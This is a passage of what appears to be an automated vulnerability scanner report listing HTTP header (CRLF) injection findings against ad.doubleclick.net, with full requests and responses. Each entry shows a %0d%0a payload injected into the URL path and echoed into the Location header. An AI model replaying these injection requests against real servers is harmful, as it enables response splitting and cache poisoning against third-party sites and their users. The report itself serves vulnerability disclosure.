GET /15b01%0d%0a972348252b4/N3285.usatoday/B2343920.27;sz=728x90;click=http%3A//gannett.gcion.com/adlink%2F5111%2F221898%2F0%2F225%2FAdId%3D1449317%3BBnId%3D1%3Bitime%3D647327658%3Bkey%3DDaniels%2Bat%2BCPAC%2Bcalls%2Bbroad%2Bcivil%2Bconservative%2Bcoalition%2Blaquo%2BDes%2BMoines%2BRegister%2BStaff%2BBlogs%3Blink%3D;ord=647327658? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15b01
972348252b4
/N3285.usatoday/B2343920.27;sz=728x90;click=http: //gannett.gcion.com/adlink/5111/221898/0/225/AdId=1449317;BnId=1;itime=647327658;key=Daniels+at+CPAC+calls+broad+civil+conservative+coalition+laquo+Des+Moines+Register+Staff+Blogs;link=;ord=647327658
Date: Mon, 14 Feb 2011 01:36:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d6f8%0d%0a603205b847e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d6f8%0d%0a603205b847e/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6f8
603205b847e
/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http: //a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66666%0d%0abd96a1a83dd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66666%0d%0abd96a1a83dd/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/66666
bd96a1a83dd
/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http: //ad.media6degrees.com/adserv/clk
Date: Mon, 14 Feb 2011 02:17:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1321c%0d%0a3e041b3a832 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1321c%0d%0a3e041b3a832/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1321c
3e041b3a832
/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http: //a.tribalfusion.com/h.click/aymMBkoAMBnGjrpd3L3aZbe2taq46rIprQIYcr01snY0VvMmaBS3b3VTFbDUmYWPEb1QsQnQWZbx0H7xT6jy4sMUXrMZbVmqw4PrhQmMH4HQO0HYZcpdEN5PvR5Gj8TVFcVsbjSm3oWtYSUFZbS2UZarVqnvTWUTotxf0C/;ord=1107215418
Date: Mon, 14 Feb 2011 03:01:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72502%0d%0a12671d1359d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72502%0d%0a12671d1359d/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/198323728.198101735/289800150/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/289800150/direct;wi.728;hi.90/01/3134178?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/i%3B234887738%3B0-0%3B0%3B58502355%3B3454-728/90%3B40213149/40230936/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72502
12671d1359d
/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=194543971:
Date: Mon, 14 Feb 2011 01:52:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adi/N5367.3630.247REALMEDIAINC.1/B4475978.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5367.3630.247REALMEDIAINC.1/B4475978.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8504a%0d%0adf688c05841 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8504a%0d%0adf688c05841/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670?;ord=669427212? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8504a
df688c05841
/N5367.3630.247REALMEDIAINC.1/B4475978.2;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/drudgereport/728x90/ron/nws/ss/a/L32/669427212/Top1/USNetwork/BCN2010050590_016_SafeAuto/SafeAuto_RTG_728_Correct.html/726348573830307044726341416f7670
Date: Mon, 14 Feb 2011 02:47:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18c9f%0d%0a0be64f77a4b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18c9f%0d%0a0be64f77a4b/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18c9f
0be64f77a4b
/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027;:
Date: Mon, 14 Feb 2011 01:36:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 676f7%0d%0a0fa438a5db8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /676f7%0d%0a0fa438a5db8/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/676f7
0fa438a5db8
/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;:
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8da73%0d%0ae56ac07066f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8da73%0d%0ae56ac07066f/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8da73
e56ac07066f
/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797
Date: Mon, 14 Feb 2011 02:10:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 353a8%0d%0a75a8fe84543 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /353a8%0d%0a75a8fe84543/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/353a8
75a8fe84543
/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303
Date: Mon, 14 Feb 2011 02:49:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a3a9%0d%0ae709d62e175 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a3a9%0d%0ae709d62e175/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a3a9
e709d62e175
/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998
Date: Mon, 14 Feb 2011 02:34:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 41285%0d%0a1e6e4985043 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /41285%0d%0a1e6e4985043/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/41285
1e6e4985043
/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000
Date: Mon, 14 Feb 2011 02:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4233.RSI/B4932906.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b8f1%0d%0a4fde4d2ea46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b8f1%0d%0a4fde4d2ea46/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http://ad.yieldmanager.com/clk?2,13%3B347c1d6bae030f8b%3B12e21cf7f71,0%3B%3B%3B2909974716,tgEAALdCCQAMv2oAAAAAACJcHgAAAAAAAgAAAAYAAAAAAP8AAAABFJxwDgAAAAAAUgYoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAopAQAAAAAAAIAAgAAAAAAZH.PIS4BAAAAAAAAAGNjZTE4Yzc2LTM3ZGEtMTFlMC05MDYyLTAwMzA0OGQ0NDg0MABwAAAAAAA=,,http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F,;ord=1297647370? HTTP/1.1
